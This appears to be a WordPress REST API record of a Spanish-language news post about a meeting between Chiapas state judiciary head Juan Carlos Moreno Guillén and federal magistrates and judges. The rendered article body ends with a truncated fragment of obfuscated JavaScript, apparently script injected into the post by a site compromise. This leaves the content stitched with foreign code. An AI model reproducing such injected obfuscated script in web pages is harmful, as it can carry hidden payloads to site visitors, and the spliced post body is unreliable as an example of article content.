{"id":25608,"date":"2025-12-04T02:51:11","date_gmt":"2025-12-04T02:51:11","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=25608"},"modified":"2025-12-04T02:51:12","modified_gmt":"2025-12-04T02:51:12","slug":"se-reune-juan-carlos-moreno-guillen-con-integrantes-del-poder-judicial-federal","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=25608","title":{"rendered":"Se re\u00fane Juan Carlos Moreno Guill\u00e9n con integrantes del Poder Judicial Federal"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"682\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/12\/1000473475-1024x682.jpg\" alt=\"\" class=\"wp-image-25609\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/12\/1000473475-1024x682.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/12\/1000473475-300x200.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/12\/1000473475-768x512.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/12\/1000473475-310x205.jpg 310w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/12\/1000473475.jpg 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Redacci\u00f3n.<\/p>\n\n\n\n<p>3 de diciembre del 2025. El magistrado presidente del Poder Judicial del Estado, Juan Carlos Moreno Guill\u00e9n, sostuvo una reuni\u00f3n con magistrados y jueces federales a fin de seguir fortaleciendo la coordinaci\u00f3n interinstitucional y compartir perspectivas sobre los retos actuales en materia de impartici\u00f3n de justicia.<\/p>\n\n\n\n<p>En este encuentro participaron los magistrados federales Luis Arturo Palacio Zurita, Camilo Pech Iuit y Jorge Mason Cal y Mayor, as\u00ed como los jueces federales Alan Antonio Cavazos Maldonado, Julio Adri\u00e1n Rodr\u00edguez Rodr\u00edguez, Ismael Arroniz Palacios y Mario Alberto Rivera Rivera.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Redacci\u00f3n. 3 de diciembre del 2025. El magistrado presidente del Poder Judicial del Estado, Juan Carlos Moreno Guill\u00e9n, sostuvo una reuni\u00f3n con magistrados y jueces federales a fin de seguir fortaleciendo la coordinaci\u00f3n interinstitucional y compartir perspectivas sobre los retos actuales en materia de impartici\u00f3n de justicia. En este encuentro participaron los magistrados federales Luis &hellip;<\/p>\n","protected":false},"author":2,"featured_media":25609,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-25608","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/25608","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=25608"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/25608\/revisions"}],"predecessor-version":[{"id":25610,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/25608\/revisions\/25610"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/25609"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=25608"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=25608"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=25608"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}